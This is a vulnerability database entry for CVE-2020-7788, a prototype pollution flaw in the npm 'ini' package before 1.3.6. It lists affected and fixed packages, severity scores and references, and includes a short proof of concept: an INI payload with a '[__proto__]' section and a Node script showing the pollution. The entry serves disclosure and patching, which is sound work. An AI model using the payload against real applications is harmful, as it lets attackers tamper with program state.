Lookup for vulnerabilities affecting packages.

Vulnerability_idVCID-7tyw-ppyt-zqgr
Summary
ini before 1.3.6 vulnerable to Prototype Pollution via ini.parse
### Overview
The `ini` npm package before version 1.3.6 has a Prototype Pollution vulnerability.

If an attacker submits a malicious INI file to an application that parses it with `ini.parse`, they will pollute the prototype on the application. This can be exploited further depending on the context.

### Patches

This has been patched in 1.3.6.

### Steps to reproduce

payload.ini
```
[__proto__]
polluted = "polluted"
```

poc.js:
```
var fs = require('fs')
var ini = require('ini')

var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8'))
console.log(parsed)
console.log(parsed.__proto__)
console.log(polluted)
```

```
> node poc.js
{}
{ polluted: 'polluted' }
{ polluted: 'polluted' }
polluted
```
Aliases
0
alias CVE-2020-7788
1
alias GHSA-qqgx-2p2h-9c37
Fixed_packages
0
url pkg:deb/debian/node-ini@2.0.0-1
purl pkg:deb/debian/node-ini@2.0.0-1
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-ini@2.0.0-1
1
url pkg:deb/debian/node-ini@2.0.0-1?distro=trixie
purl pkg:deb/debian/node-ini@2.0.0-1?distro=trixie
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-ini@2.0.0-1%3Fdistro=trixie
2
url pkg:deb/debian/node-ini@3.0.1-2?distro=trixie
purl pkg:deb/debian/node-ini@3.0.1-2?distro=trixie
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-ini@3.0.1-2%3Fdistro=trixie
3
url pkg:npm/ini@1.3.6
purl pkg:npm/ini@1.3.6
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/ini@1.3.6
Affected_packages
0
url pkg:deb/debian/node-ini@1.1.0-1
purl pkg:deb/debian/node-ini@1.1.0-1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-7tyw-ppyt-zqgr
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-ini@1.1.0-1
1
url pkg:deb/debian/node-ini@1.3.5-1%2Bdeb10u1
purl pkg:deb/debian/node-ini@1.3.5-1%2Bdeb10u1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-7tyw-ppyt-zqgr
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-ini@1.3.5-1%252Bdeb10u1
2
url pkg:npm/ini@1.0.0
purl pkg:npm/ini@1.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-7tyw-ppyt-zqgr
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/ini@1.0.0
3
url pkg:npm/ini@1.0.1
purl pkg:npm/ini@1.0.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-7tyw-ppyt-zqgr
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/ini@1.0.1
4
url pkg:npm/ini@1.0.2
purl pkg:npm/ini@1.0.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-7tyw-ppyt-zqgr
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/ini@1.0.2
5
url pkg:npm/ini@1.0.3
purl pkg:npm/ini@1.0.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-7tyw-ppyt-zqgr
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/ini@1.0.3
6
url pkg:npm/ini@1.0.4
purl pkg:npm/ini@1.0.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-7tyw-ppyt-zqgr
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/ini@1.0.4
7
url pkg:npm/ini@1.0.5
purl pkg:npm/ini@1.0.5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-7tyw-ppyt-zqgr
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/ini@1.0.5
8
url pkg:npm/ini@1.1.0
purl pkg:npm/ini@1.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-7tyw-ppyt-zqgr
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/ini@1.1.0
9
url pkg:npm/ini@1.2.0
purl pkg:npm/ini@1.2.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-7tyw-ppyt-zqgr
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/ini@1.2.0
10
url pkg:npm/ini@1.2.1
purl pkg:npm/ini@1.2.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-7tyw-ppyt-zqgr
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/ini@1.2.1
11
url pkg:npm/ini@1.3.0
purl pkg:npm/ini@1.3.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-7tyw-ppyt-zqgr
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/ini@1.3.0
12
url pkg:npm/ini@1.3.1
purl pkg:npm/ini@1.3.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-7tyw-ppyt-zqgr
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/ini@1.3.1
13
url pkg:npm/ini@1.3.2
purl pkg:npm/ini@1.3.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-7tyw-ppyt-zqgr
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/ini@1.3.2
14
url pkg:npm/ini@1.3.3
purl pkg:npm/ini@1.3.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-7tyw-ppyt-zqgr
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/ini@1.3.3
15
url pkg:npm/ini@1.3.4
purl pkg:npm/ini@1.3.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-7tyw-ppyt-zqgr
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/ini@1.3.4
16
url pkg:npm/ini@1.3.5
purl pkg:npm/ini@1.3.5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-7tyw-ppyt-zqgr
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/ini@1.3.5
17
url pkg:rpm/redhat/nodejs-nodemon@2.0.19-1?arch=el9_0
purl pkg:rpm/redhat/nodejs-nodemon@2.0.19-1?arch=el9_0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-4f1w-xpyy-2fcf
1
vulnerability VCID-7tyw-ppyt-zqgr
2
vulnerability VCID-c86y-234c-s3hu
3
vulnerability VCID-vg3f-8mjh-bbf5
4
vulnerability VCID-vg7c-pctm-m7gn
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/nodejs-nodemon@2.0.19-1%3Farch=el9_0
18
url pkg:rpm/redhat/rh-nodejs10-nodejs@10.23.1-2?arch=el7
purl pkg:rpm/redhat/rh-nodejs10-nodejs@10.23.1-2?arch=el7
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-4b6t-hfzu-7uf5
1
vulnerability VCID-7tyw-ppyt-zqgr
2
vulnerability VCID-cqs6-2ryh-43gj
3
vulnerability VCID-e2wc-na6c-c3cr
4
vulnerability VCID-fu8u-pxaa-43be
5
vulnerability VCID-jqtk-shbr-nkaw
6
vulnerability VCID-kh5k-ynnf-2bbx
7
vulnerability VCID-v5h1-gpt1-97bj
8
vulnerability VCID-zj4d-e8r7-ufg3
9
vulnerability VCID-ztt4-vnk7-7ycq
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/rh-nodejs10-nodejs@10.23.1-2%3Farch=el7
19
url pkg:rpm/redhat/rh-nodejs12-nodejs@12.20.1-1?arch=el7
purl pkg:rpm/redhat/rh-nodejs12-nodejs@12.20.1-1?arch=el7
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-75cr-t5b7-67d8
1
vulnerability VCID-7tyw-ppyt-zqgr
2
vulnerability VCID-cu35-t78a-wfcj
3
vulnerability VCID-k6bh-s1cq-n3a7
4
vulnerability VCID-v5h1-gpt1-97bj
5
vulnerability VCID-zj4d-e8r7-ufg3
6
vulnerability VCID-ztt4-vnk7-7ycq
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/rh-nodejs12-nodejs@12.20.1-1%3Farch=el7
20
url pkg:rpm/redhat/rh-nodejs12-nodejs@12.22.5-1?arch=el7
purl pkg:rpm/redhat/rh-nodejs12-nodejs@12.22.5-1?arch=el7
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1xdz-dku3-qqc4
1
vulnerability VCID-4f1w-xpyy-2fcf
2
vulnerability VCID-53xm-8w84-93cx
3
vulnerability VCID-7cth-47w2-17hy
4
vulnerability VCID-7tyw-ppyt-zqgr
5
vulnerability VCID-9g7s-y7nq-xfbb
6
vulnerability VCID-a9w9-1d4p-vqau
7
vulnerability VCID-ap4u-dkwx-1kb3
8
vulnerability VCID-e7n4-x8sc-3bb6
9
vulnerability VCID-tsp3-tyjt-h7bk
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/rh-nodejs12-nodejs@12.22.5-1%3Farch=el7
21
url pkg:rpm/redhat/rh-nodejs12-nodejs-nodemon@2.0.3-1?arch=el7
purl pkg:rpm/redhat/rh-nodejs12-nodejs-nodemon@2.0.3-1?arch=el7
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-75cr-t5b7-67d8
1
vulnerability VCID-7tyw-ppyt-zqgr
2
vulnerability VCID-cu35-t78a-wfcj
3
vulnerability VCID-k6bh-s1cq-n3a7
4
vulnerability VCID-v5h1-gpt1-97bj
5
vulnerability VCID-zj4d-e8r7-ufg3
6
vulnerability VCID-ztt4-vnk7-7ycq
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/rh-nodejs12-nodejs-nodemon@2.0.3-1%3Farch=el7
22
url pkg:rpm/redhat/rh-nodejs12-nodejs-nodemon@2.0.3-5?arch=el7
purl pkg:rpm/redhat/rh-nodejs12-nodejs-nodemon@2.0.3-5?arch=el7
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1xdz-dku3-qqc4
1
vulnerability VCID-4f1w-xpyy-2fcf
2
vulnerability VCID-53xm-8w84-93cx
3
vulnerability VCID-7cth-47w2-17hy
4
vulnerability VCID-7tyw-ppyt-zqgr
5
vulnerability VCID-9g7s-y7nq-xfbb
6
vulnerability VCID-a9w9-1d4p-vqau
7
vulnerability VCID-ap4u-dkwx-1kb3
8
vulnerability VCID-e7n4-x8sc-3bb6
9
vulnerability VCID-tsp3-tyjt-h7bk
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/rh-nodejs12-nodejs-nodemon@2.0.3-5%3Farch=el7
23
url pkg:rpm/redhat/rh-nodejs14-nodejs@14.15.4-2?arch=el7
purl pkg:rpm/redhat/rh-nodejs14-nodejs@14.15.4-2?arch=el7
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-7tyw-ppyt-zqgr
1
vulnerability VCID-fu8u-pxaa-43be
2
vulnerability VCID-kh5k-ynnf-2bbx
3
vulnerability VCID-m4sn-7wuq-e3cd
4
vulnerability VCID-v5h1-gpt1-97bj
5
vulnerability VCID-zj4d-e8r7-ufg3
6
vulnerability VCID-ztt4-vnk7-7ycq
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/rh-nodejs14-nodejs@14.15.4-2%3Farch=el7
24
url pkg:rpm/redhat/rh-nodejs14-nodejs-nodemon@2.0.3-5?arch=el7
purl pkg:rpm/redhat/rh-nodejs14-nodejs-nodemon@2.0.3-5?arch=el7
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-4f1w-xpyy-2fcf
1
vulnerability VCID-7tyw-ppyt-zqgr
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/rh-nodejs14-nodejs-nodemon@2.0.3-5%3Farch=el7
References
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-7788.json
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-7788.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-7788
reference_id
reference_type
scores
0
value 0.00291
scoring_system epss
scoring_elements 0.52555
published_at 2026-05-14T12:55:00Z
1
value 0.00291
scoring_system epss
scoring_elements 0.52484
published_at 2026-04-09T12:55:00Z
2
value 0.00291
scoring_system epss
scoring_elements 0.52535
published_at 2026-04-11T12:55:00Z
3
value 0.00291
scoring_system epss
scoring_elements 0.52518
published_at 2026-04-12T12:55:00Z
4
value 0.00291
scoring_system epss
scoring_elements 0.52502
published_at 2026-04-13T12:55:00Z
5
value 0.00291
scoring_system epss
scoring_elements 0.52541
published_at 2026-04-16T12:55:00Z
6
value 0.00291
scoring_system epss
scoring_elements 0.52546
published_at 2026-04-18T12:55:00Z
7
value 0.00291
scoring_system epss
scoring_elements 0.5253
published_at 2026-04-21T12:55:00Z
8
value 0.00291
scoring_system epss
scoring_elements 0.52477
published_at 2026-04-24T12:55:00Z
9
value 0.00291
scoring_system epss
scoring_elements 0.52488
published_at 2026-05-09T12:55:00Z
10
value 0.00291
scoring_system epss
scoring_elements 0.52449
published_at 2026-04-29T12:55:00Z
11
value 0.00291
scoring_system epss
scoring_elements 0.52392
published_at 2026-05-05T12:55:00Z
12
value 0.00291
scoring_system epss
scoring_elements 0.5245
published_at 2026-05-11T12:55:00Z
13
value 0.00291
scoring_system epss
scoring_elements 0.52475
published_at 2026-05-12T12:55:00Z
14
value 0.00291
scoring_system epss
scoring_elements 0.52398
published_at 2026-04-01T12:55:00Z
15
value 0.00291
scoring_system epss
scoring_elements 0.52444
published_at 2026-05-07T12:55:00Z
16
value 0.00291
scoring_system epss
scoring_elements 0.52471
published_at 2026-04-04T12:55:00Z
17
value 0.00291
scoring_system epss
scoring_elements 0.52437
published_at 2026-04-07T12:55:00Z
18
value 0.00291
scoring_system epss
scoring_elements 0.52489
published_at 2026-04-08T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-7788
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7788
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7788
3
reference_url https://github.com/npm/ini
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/npm/ini
4
reference_url https://github.com/npm/ini/commit/56d2805e07ccd94e2ba0984ac9240ff02d44b6f1
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/npm/ini/commit/56d2805e07ccd94e2ba0984ac9240ff02d44b6f1
5
reference_url https://lists.debian.org/debian-lts-announce/2020/12/msg00032.html
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2020/12/msg00032.html
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-7788
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-7788
7
reference_url https://snyk.io/vuln/SNYK-JS-INI-1048974
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://snyk.io/vuln/SNYK-JS-INI-1048974
8
reference_url https://www.npmjs.com/advisories/1589
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.npmjs.com/advisories/1589
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1907444
reference_id 1907444
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1907444
10
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=977718
reference_id 977718
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=977718
11
reference_url https://github.com/advisories/GHSA-qqgx-2p2h-9c37
reference_id GHSA-qqgx-2p2h-9c37
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-qqgx-2p2h-9c37
12
reference_url https://access.redhat.com/errata/RHSA-2021:0421
reference_id RHSA-2021:0421
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0421
13
reference_url https://access.redhat.com/errata/RHSA-2021:0485
reference_id RHSA-2021:0485
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0485
14
reference_url https://access.redhat.com/errata/RHSA-2021:0521
reference_id RHSA-2021:0521
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0521
15
reference_url https://access.redhat.com/errata/RHSA-2021:0548
reference_id RHSA-2021:0548
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0548
16
reference_url https://access.redhat.com/errata/RHSA-2021:0549
reference_id RHSA-2021:0549
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0549
17
reference_url https://access.redhat.com/errata/RHSA-2021:0551
reference_id RHSA-2021:0551
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0551
18
reference_url https://access.redhat.com/errata/RHSA-2021:3280
reference_id RHSA-2021:3280
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:3280
19
reference_url https://access.redhat.com/errata/RHSA-2021:3281
reference_id RHSA-2021:3281
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:3281
20
reference_url https://access.redhat.com/errata/RHSA-2021:5171
reference_id RHSA-2021:5171
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:5171
21
reference_url https://access.redhat.com/errata/RHSA-2022:0246
reference_id RHSA-2022:0246
reference_type
scores
url https://access.redhat.com/errata/RHSA-2022:0246
22
reference_url https://access.redhat.com/errata/RHSA-2022:0350
reference_id RHSA-2022:0350
reference_type
scores
url https://access.redhat.com/errata/RHSA-2022:0350
23
reference_url https://access.redhat.com/errata/RHSA-2022:6595
reference_id RHSA-2022:6595
reference_type
scores
url https://access.redhat.com/errata/RHSA-2022:6595
Weaknesses
0
cwe_id 1321
name Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
description The product receives input from an upstream component that specifies attributes that are to be initialized or updated in an object, but it does not properly control modifications of attributes of the object prototype.
1
cwe_id 400
name Uncontrolled Resource Consumption
description The product does not properly control the allocation and maintenance of a limited resource, thereby enabling an actor to influence the amount of resources consumed, eventually leading to the exhaustion of available resources.
2
cwe_id 1035
name OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities
description Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2017.
3
cwe_id 937
name OWASP Top Ten 2013 Category A9 - Using Components with Known Vulnerabilities
description Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2013.
Exploits
Severity_range_score7.0 - 8.9
Exploitability0.5
Weighted_severity8.0
Risk_score4.0
Resource_urlhttp://public2.vulnerablecode.io/vulnerabilities/VCID-7tyw-ppyt-zqgr